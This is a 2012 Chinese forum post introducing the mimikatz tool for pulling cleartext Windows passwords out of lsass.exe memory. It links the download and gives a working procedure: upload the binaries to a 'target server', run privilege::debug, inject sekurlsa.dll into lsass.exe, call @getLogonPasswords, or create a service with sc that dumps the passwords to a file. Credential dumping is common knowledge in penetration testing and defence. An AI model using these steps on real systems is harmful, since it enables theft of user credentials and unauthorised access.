-
-
可怕的神器:抓取windows明文密钥--mimikatz
-
发表于:
2012-4-11 09:19
11819
-
可怕的神器:抓取windows明文密钥--mimikatz
先放软件地址:
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
这是一位法国人写的一个工具,非常强大,可以说有点颠覆的感觉。下面听我慢慢道来:
由于本人初到kanxue不知道怎么插入图片,测试图没法放上来,所以尽量文字了。
大家可以先看一篇博文,这是关于mimikatz直接从 lsass.exe 中获取当前用户明文密码的文章:
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
大家都知道windows的密码是可逆的加密算法,hash算法是不可逆的,因此很多做渗透的人往往利用wce.exe 或 lslsass.exe这两个工具取得hash 值,利用彩虹表跑密码。这种方式比较暴力。而此工具在注入 lsass.exe 时。调用的 sekurlsa.dll 应该包含了对应的解密算法,因此才能抓到明文密码。懂逆向分析的朋友可以测试下,本人在这里就不过多赘述了。
这个工具可以提升进程权限,注入进程,读取进程内存,调试程序等等很多功能,大家有空可以试一试。
该工具对win 03 win08 vista win7均有效,xp(不稳定),2000 不行(至少目前测试结果来看)
测试环境:
windows server 2003 Enterprise Edition 5.2.3790 sp2
测试步骤:
1、要抓去密码,需要找到以下三个文件:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll
2、上传至目标服务器,(路径不含中文,否则加载DLL的时候会报错),目录要有执行权限。
3、可以通过以下方法抓取:
//PsExec.exe 启动。
//在本机启动交互式命令提示窗口(远程执行)
psexec \\127.0.0.1 cmd.exe
//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提权
privilege::debug
//注入dll,注意使用绝对路径
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit
//*********************************************************
//使用 At 启动
at ***
//*********************************************************
//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
Ps:怎么插入本地图片告诉我一下,纠结ing……
[课程]FART 脱壳王!加量不加价!FART作者讲授!